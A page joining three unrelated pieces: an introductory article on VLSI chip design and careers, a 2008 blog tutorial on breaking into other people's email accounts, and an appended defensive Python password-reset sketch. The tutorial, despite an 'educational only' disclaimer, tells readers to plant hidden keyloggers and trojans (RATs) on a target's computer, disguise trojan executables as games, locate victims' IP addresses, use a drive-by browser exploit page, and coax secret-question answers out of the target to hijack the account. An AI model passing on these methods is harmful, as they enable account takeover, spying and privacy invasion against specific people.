What is VLSI? VLSI stands for "Very Large Scale Integration". This is the field, which involves packing more and more logic devices into smaller and smaller areas. Thanks to VLSI, circuits that would have taken boardfuls of space can now be put into a small space few millimeters across! This has opened up a big opportunity to do things that were not possible before. VLSI circuits are everywhere ... your computer, your car, your brand new state-of-the-art digital camera, the cell-phones, and what have you. All this involves a lot of expertise on many fronts within the same field, which we will look at in later sections. VLSI has been around for a long time, there is nothing new about it ... but as a side effect of advances in the world of computers, there has been a dramatic proliferation of tools that can be used to design VLSI circuits. Alongside, obeying Moore's law, the capability of an IC has increased exponentially over the years, in terms of computation power, utilization of available area, yield. The combined effect of these two advances is that people can now put diverse functionality into the IC's, opening up new frontiers. Examples are embedded systems, where intelligent devices are put inside everyday objects, and ubiquitous computing where small computing devices proliferate to such an extent that even the shoes you wear may actually do something useful like monitoring your heartbeats! These two fields are related, and getting into their description can easily lead to another article.

 

DEALING WITH VLSI CIRCUITS

Digital VLSI circuits are predominantly CMOS based. The way normal blocks like latches and gates are implemented is different from what students have seen so far, but the behavior remains the same. All the miniaturization involves new things to consider. A lot of thought has to go into actual implementations as well as design. Let us look at some of the factors involved...

  1. Circuit Delays. Large, complicated circuits running at very high frequencies have one big problem to tackle: delays in the propagation of signals through gates and wires ... even for areas a few micrometers across! The operating speed is so high that as the delays add up, they can actually become comparable to the clock period.
  2. Power. Another effect of high operating frequencies is increased power consumption. This has a two-fold effect: devices drain batteries faster, and heat dissipation increases. Coupled with the fact that surface areas have decreased, heat poses a major threat to the stability of the circuit itself.
  3. Layout. Laying out the circuit components is a task common to all branches of electronics. What is special in our case is that there are many possible ways to do this; there can be multiple layers of different materials on the same silicon, there can be different arrangements of the smaller parts for the same component, and so on.

The power dissipation and speed of a circuit present a trade-off; if we try to optimize one, the other is affected. The choice between the two is determined by the way we choose to lay out the circuit components. Layout can also affect the fabrication of VLSI chips, making it either easy or difficult to implement the components on the silicon.

 

THE VLSI DESIGN PROCESS 
A typical digital design flow is as follows:

  • Specification
  • Architecture
  • RTL Coding
  • RTL Verification
  • Synthesis
  • Backend
  • Tape out to foundry to get the end product: a wafer with a repeated number of identical ICs.

 

All modern digital designs start with a designer writing a hardware description of the IC (using HDL or Hardware Description Language) in Verilog/VHDL. A Verilog or VHDL program essentially describes the hardware (logic gates, Flip-Flops, counters etc) and the interconnect of the circuit blocks and the functionality. Various CAD tools are available to synthesize a circuit based on the HDL.

Without going into details, we can say that VHDL can be called the "C" of the VLSI industry. VHDL stands for "VHSIC Hardware Definition Language", where VHSIC stands for "Very High Speed Integrated Circuit". This language is used to design circuits at a high level, in two ways. It can either be a behavioral description, which describes what the circuit is supposed to do, or a structural description, which describes what the circuit is made of. There are other languages for describing circuits, such as Verilog, which work in a similar fashion.

Both forms of description are then used to generate a very low-level description that actually spells out how all these are to be fabricated on the silicon chips. This will result in the manufacture of the intended IC.

In case of analog design, the flow changes somewhat. A typical analog design flow is as follows:

  • Specifications
  • Architecture
  • Circuit Design
  • Simulation
  • Layout
  • Parametric Extraction / Back Annotation
  • Final Design
  • Tape Out to foundry.

 

While digital design is highly automated now, only a very small portion of analog design can be automated. There is a hardware description language called AHDL, but it is not widely used because it does not accurately give us the behavioral model of the circuit, owing to the complexity of the effects of parasitics on the analog behavior of the circuit. Many analog chips are what are termed "flat" or non-hierarchical designs. This is true for small transistor count chips such as an operational amplifier, a filter or a power management chip. For more complex analog chips such as data converters, the design is done at a transistor level, building up to a cell level, then a block level, and then integrated at a chip level. Not many CAD tools are available for analog design even today, and thus analog design remains a difficult art.

 

MOST OF TODAY'S VLSI DESIGNS ARE CLASSIFIED INTO THREE CATEGORIES:

  1. Analog: Small transistor count precision circuits such as Amplifiers, Data converters, filters, Phase Locked Loops, Sensors etc.
  2. ASICS or Application Specific Integrated Circuits: Progress in the fabrication of IC's has enabled us to create fast and powerful circuits in smaller and smaller devices. This also means that we can pack a lot more of functionality into the same area. The biggest application of this ability is found in the design of ASIC's. These are IC's that are created for specific purposes - each device is created to do a particular job, and do it well. The most common application area for this is DSP - signal filters, image compression, etc. To go to extremes, consider the fact that the digital wristwatch normally consists of a single IC doing all the time-keeping jobs as well as extra features like games, calendar, etc.
  3. SoC or Systems on a chip: These are highly complex mixed signal circuits (digital and analog all on the same chip). A network processor chip or a wireless radio chip is an example of an SoC.

 

DEVELOPMENTS IN THE FIELD OF VLSI

There are a number of directions a person can take in VLSI, and they are all closely related to each other. Together, these developments are going to make possible the visions of embedded systems and ubiquitous computing.

  1. Reconfigurable computing: Reconfigurable computing is a very interesting and pretty recent development in microelectronics. It involves fabricating circuits that can be reprogrammed on the fly! And no, we are not talking about microcontrollers running with EEPROM inside. Reconfigurable computing involves specially fabricated devices called FPGA's, that when programmed act just like normal electronic circuits. They are so designed that by changing or "reprogramming" the connections between numerous sub modules, the FPGA's can be made to behave like any circuit we wish. This fantastic ability to create modifiable circuits again opens up new possibilities in microelectronics. Consider for example, microprocessors, which are partly reconfigurable. We know that running complex programs can benefit greatly if support was built into the hardware itself. We could have a microprocessor that could optimize itself for every task that it tackled! Or then consider a system that is too big to implement on hardware that may be limited by cost, or other constraints. If we use a reconfigurable platform, we could design the system so that parts of it are mapped onto the same hardware, at different times. One could think of many such applications, not the least of which is prototyping - using an FPGA to try out a new design before it is actually fabricated. This can drastically reduce development cycles, and also save some money that would have been spent in fabricating prototype IC's.
  2. Software Engineers taking over hardware design? ASIC's provide the path to creating miniature devices that can do a lot of diverse functions. But with the impending boom in this kind of technology, what we need is a large number of people who can design these IC's. This is where we realize that we cross the threshold between a chip designer and a systems designer at a higher level. Does a person designing a chip really need to know every minute detail of the IC manufacturing process? Can there be tools that allow a designer to simply create design specifications that get translated into hardware specifications? The solution to this is rather simple - hardware compilers or silicon compilers as they are called. We know by now that there exist languages like VHDL which can be used to specify the design of a chip. What if we had a compiler that converts a high level language into a VHDL specification? The potential of this technology is tremendous - in a simple manner, we can convert all the software programmers into hardware designers!
  3. The need for hardware compilers: Before we go further let us look at why we need this kind of technology, that can convert high-level languages into hardware definitions. We see a set of needs, which actually lead from one to the other in a series.
    1. Rapid development cycles. The traditional method of designing hardware is a long and winding process, going through many stages with special effort spent in design verification at every stage. This means that the time from drawing board to market is very long. This proves to be rather undesirable in case of a large expanding market, with many competitors trying to grab a share. We need alternatives to cut down on this time so that new ideas reach the market faster, where the first person to get in normally gains a large advantage.
    2. Large number of designers. With embedded systems becoming more and more popular, there is a need for a large number of chip designers, who can churn out chips designed for specific applications. It's impractical to think of training so many people in the intricacies of VLSI design.
    3. Specialized training. A person who wishes to design ASIC's will require extensive training in the field of VLSI design. But we cannot possibly expect to find a large number of people who would wish to undergo such training. Also, the process of training these people will itself entail large investments in time and money. This means there has to be a system which can abstract out all the details of VLSI, and which allows the user to think in simple system-level terms.

     There are quite a few tools available for using high-level languages in circuit design. But this area has started showing fruits only recently. For example, there is a language called Handel-C, that looks just like good old C. But it has some special extensions that make it usable for defining circuits. A program written in Handel-C can be represented block-by-block by hardware equivalents. And in doing all this, the compiler takes care of all low-level issues like clock-frequency, layout, etc. The biggest selling point is that the user does not really have to learn anything new, except for the few extensions made to C, so that it may be conveniently used for circuit design. Another quite different language, that is still under development, is Lava. This is based on an esoteric branch of computer science, called "functional programming". FP itself is pretty old, and is radically different from the normal way we write programs. This is because it assumes parallel execution as a part of its structure - it's not based on the normal idea of "sequence of instructions". This parallel nature is something very suitable for hardware since the logic circuits are inherently parallel in nature. Preliminary studies have shown that Lava can actually create better circuits than VHDL itself, since it affords a high-level view of the system, without losing sight of low-level features.

 

WHAT SORTS OF JOBS DOES AN ELECTRONICS ENGINEER DO?

As mentioned above, the main job functions in this industry are Design, Product, Test, Applications and Process Engineering. For the sake of clarity, product engineering and test engineering functions are described separately, but it is most efficient to combine these two functions into one engineer because of the interdependency and overlap of skills, tasks and job functions. 

  1. Design Engineer: Takes specifications, defines architecture, does circuit design, runs simulations, supervises layout, tapes out the chip to the foundry, evaluates the prototype once the chip comes back from the fab.
  2. Product Engineer: Gets involved in the project during the design phase, ensures manufacturability, develops characterization plan, assembly guidelines, develops quality and reliability plan, evaluates the chip with the design engineer, evaluates the chip through characterization, reliability qualification and manufacturing yield point of view (statistical data analysis). He is responsible for production release and is therefore regarded as a team leader on the project. Post production, he is responsible for customer returns, failure analysis, and corrective actions including design changes.
  3. Test Engineer: Develops test plan for the chip based on specifications and data sheet, creates characterization and production program for the bench test or the ATE (Automatic Test Equipment), designs test board hardware, correlates ATE results with the bench results to validate silicon to compare with simulation results. He works closely with the product engineer to ensure smooth release to production and post release support.
  4. Applications Engineer: Defines new products from system point of view at the customer's end, based on marketing input. His mission is to ensure the chip works in the system designed or used by the customers, and complies with appropriate standards (such as Ethernet, SONET, WiFi etc.). He is responsible for all customer technical support, firmware development, evaluation boards, data sheets and all product documentation such as application notes, trade shows, magazine articles, evaluation reports, software drivers and so on.
  5. Process Engineer: This is a highly specialized function which involves new wafer process development, device modeling, and lots of research and development projects. There are no quick rewards on this job! If you are R&D oriented, highly trained in semiconductor device physics area, do not mind wearing bunny suits (the clean room uniforms used in all fabs), willing to experiment, this job is for you.
  6. Packaging Engineer: This is another highly specialized job function. He develops precision packaging technology, new package designs for the chips, does the characterization of new packages, and does electrical modeling of the new designs.
  7. CAD Engineer: This is an engineering function that supports the design engineering function. He is responsible for acquiring, maintaining or developing all CAD tools used by a design engineer. Most companies buy commercially available CAD tools for schematic capture, simulation, synthesis, test vector generation, layout, parametric extraction, power estimation, and timing closure; but in several cases, these tools need some type of customization. A CAD engineer needs to be highly skilled in the use of these tools, be able to write software routines to automate as many functions as possible and have a clear understanding of the entire design flow.

WHO CAN ENTER THIS FIELD AND HOW?

Those of us who are already enjoying the brainteasers in designing and testing The Chips find it very rewarding, not just from an intellectual point of view but also from the "pocket" point of view. When these two views converge, it creates an engineer's paradise. Who wouldn't like the best of both worlds? With all the innovation and rapid development, this field has virtually unlimited scope to grow.

This is all fine, but it raises a million questions. To state a few: How does one get a foot in the door in this field? When do you start thinking about choosing this branch? What does it take? Where do you get the training? What sort of jobs are available and where? How much does it really pay as an engineer and what are the growth prospects for a fresh entrant? Does he choose a technical career path or a management path? This is an attempt to guide you on the right path when you are about to make an important choice in your career. The idea is to give you a flavor of what to look for, and not to intimidate you with technical jargon (not yet anyway!) and information overload.

First of all, let's make it clear that it is not mandatory to have a BE in Electronics to work in this field. It certainly is the obvious degree to earn, but a quality graduate or post-graduate degree in Physics also qualifies one to work as an engineer. The Physics of Semiconductor Devices is the fundamental basis of VLSI. We will see how the choice of various curricula shapes up the job scene, but for now, let's concentrate on the initials.

AFTER ALL THIS EDUCATION AND YEARS OF HARD WORK, IS THE MONEY WORTH IT?

Well, that really is a matter of personal choice. For those who want to be ambitious engineers, let us level the field of expectations! A fresh college graduate with a professional course in VLSI Design entering the VLSI field can expect a starting salary in the range of $45,000 to $55,000 per year. In India, the range is Rs. 2.4 lakhs upwards per year depending on the company, the need and the skill level demonstrated. Design engineers are the most sought after because of the industry's emphasis on continuous new product development, miniaturization and innovation in integration. Typically, a graduate with a Master's degree can expect about 10% higher than one with a Bachelor's, and someone with a Ph.D. can expect a wide range. As you gain experience, this field offers some of the best growth potential, on both the technical and the management ladder. Salary surveys can be found on-line at www.ieee.org

 

WHAT ARE THE TYPICAL COMPANIES I CAN SEARCH FOR ON THE WEB TO GET MORE INFORMATION ON VLSI TECHNOLOGY AND JOBS? 

Intel, IBM, Texas Instruments, Motorola, National Semiconductor, Maxim, Linear Technology, Siemens, Qualcomm and CG-CoreEL are some of the names, just to mention a few. All have impressive websites and loads of information.

Monday, October 20, 2008

HACKING TECHNIQUES

HOW TO BREAK EMAIL ACCOUNTS

WARNING:

I do not endorse hacking!
This is meant for educational purposes only!
I want you to know how others can try to break into your personal life!
Beware!

This is a Genuine Article.

Will try to add in as much as possible
keep posting !
comment on this article !


INTRODUCTION:


I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.



Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when pursuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...

Things You Should Know

 

As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They cannot be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now let's get to what you want to know.

If You Have Physical Access

I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).

Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....



www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171


 

Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.


One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host its service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that its server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...

If You Don't Have Physical Access

Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
 

The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an HTML document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then embed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you cannot contact this user in any way to do any of the above tricks? Well, then you definitely have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. 

Good luck...
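
From the defender's side, the "Forgot my Password" weakness described above exists because guessable personal facts (birthday, zip code, a pet's name) authorize the reset, and because the password changes before ownership is proven. The following is an added example, not code from the original tutorial or from any mail provider: a reset flow with no secret questions, where the class name `ResetService`, the policy constants and the `example.test` addresses are all assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed policy: reset tokens live 15 minutes
MAX_REQUESTS_PER_HOUR = 3     # assumed policy: cap reset messages per account


class ResetService:
    """In-memory sketch of a password-reset flow without knowledge-based questions."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._accounts = {}   # user -> {"pw": (salt, digest), "recovery": address}
        self._pending = {}    # user -> (sha256 of token, expiry time)
        self._requests = {}   # user -> timestamps of recent reset requests
        self.outbox = []      # (address, message); stands in for mail/SMS delivery

    @staticmethod
    def _hash_password(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, user, password, recovery_address):
        salt = secrets.token_bytes(16)
        self._accounts[user] = {
            "pw": (salt, self._hash_password(password, salt)),
            "recovery": recovery_address,
        }

    def check_password(self, user, password):
        account = self._accounts.get(user)
        if account is None:
            return False
        salt, digest = account["pw"]
        return hmac.compare_digest(digest, self._hash_password(password, salt))

    def request_reset(self, user):
        """Send a token to the pre-registered recovery address only.

        The reply text is identical for known, unknown and rate-limited
        accounts, and the current password is left untouched.
        """
        now = self._clock()
        account = self._accounts.get(user)
        if account is not None:
            recent = [t for t in self._requests.get(user, []) if now - t < 3600]
            if len(recent) < MAX_REQUESTS_PER_HOUR:
                recent.append(now)
                token = secrets.token_urlsafe(32)
                # Store only a hash so a leaked table cannot be replayed.
                self._pending[user] = (
                    hashlib.sha256(token.encode()).digest(),
                    now + TOKEN_TTL_SECONDS,
                )
                self.outbox.append((account["recovery"], f"Reset token: {token}"))
            self._requests[user] = recent
        return "If the account exists, a reset message has been sent."

    def complete_reset(self, user, token, new_password):
        pending = self._pending.get(user)
        if pending is None:
            return False
        token_hash, expiry = pending
        if self._clock() > expiry:
            del self._pending[user]          # expired tokens are discarded
            return False
        presented = hashlib.sha256(token.encode()).digest()
        if not hmac.compare_digest(token_hash, presented):
            return False
        del self._pending[user]              # single use
        salt = secrets.token_bytes(16)
        self._accounts[user]["pw"] = (salt, self._hash_password(new_password, salt))
        # Tell the owner, so an unexpected change is noticed quickly.
        self.outbox.append((self._accounts[user]["recovery"], "Your password was changed."))
        return True


def demo():
    """Walk through the flow with constructed sample data and a fake clock."""
    now = [1_000_000.0]
    svc = ResetService(clock=lambda: now[0])
    svc.register("alice", "old-password", "alice-recovery@example.test")
    results = {}
    svc.request_reset("alice")
    results["old_password_still_valid"] = svc.check_password("alice", "old-password")
    # A personal fact such as a pet's name is not a token and is rejected.
    results["guess_rejected"] = not svc.complete_reset("alice", "Rex", "x")
    token = svc.outbox[-1][1].split(": ", 1)[1]
    now[0] += TOKEN_TTL_SECONDS + 1
    results["expired_rejected"] = not svc.complete_reset("alice", token, "new-pw")
    svc.request_reset("alice")
    token = svc.outbox[-1][1].split(": ", 1)[1]
    results["valid_accepted"] = svc.complete_reset("alice", token, "new-pw")
    results["replay_rejected"] = not svc.complete_reset("alice", token, "again")
    results["same_reply_for_unknown"] = (
        svc.request_reset("nobody") == svc.request_reset("alice")
    )
    return results
```

Because the old password keeps working until a valid token is redeemed, an unsolicited reset request does not lock the owner out, and the change notification gives them a signal to act on.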